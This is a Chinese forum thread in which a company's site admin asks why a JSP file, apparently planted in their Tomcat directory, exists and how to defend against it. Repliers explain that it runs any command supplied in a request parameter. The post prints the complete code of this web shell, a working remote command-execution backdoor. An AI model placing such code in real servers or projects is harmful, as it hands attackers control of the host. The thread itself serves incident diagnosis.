网站被注入恶意代码,有什么目的,请大家帮我看看

我们的公司的网站被注入恶意代码,请问这是怎么做到的,怎么防范,我在根目录查看到一个tomcat文件夹,里面有一个jsp文件,代码如下<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

解决方案 »

  1.   

    我们的公司的网站被注入恶意代码,请问这是怎么做到的?不明白你的注入是什么意思?如果这个jsp文件的内容是无缘无故产生的,说明应该是你周围的人给你加的
    如果不是的话,这个jsp文件是你自己创建的话,黑你很容易,按你说的提供请求参数即可。
      

  2.   

    jsp文件应该不是外部人员注入的,按上面的代码,黑你容易得很,给你传入相应的参数,就好像再“运行”里面输入命令,然后结果输出再页面上
      

  3.   

    不一定是FOMAT硬盘。。这个有可能是玩笑吧~~ ;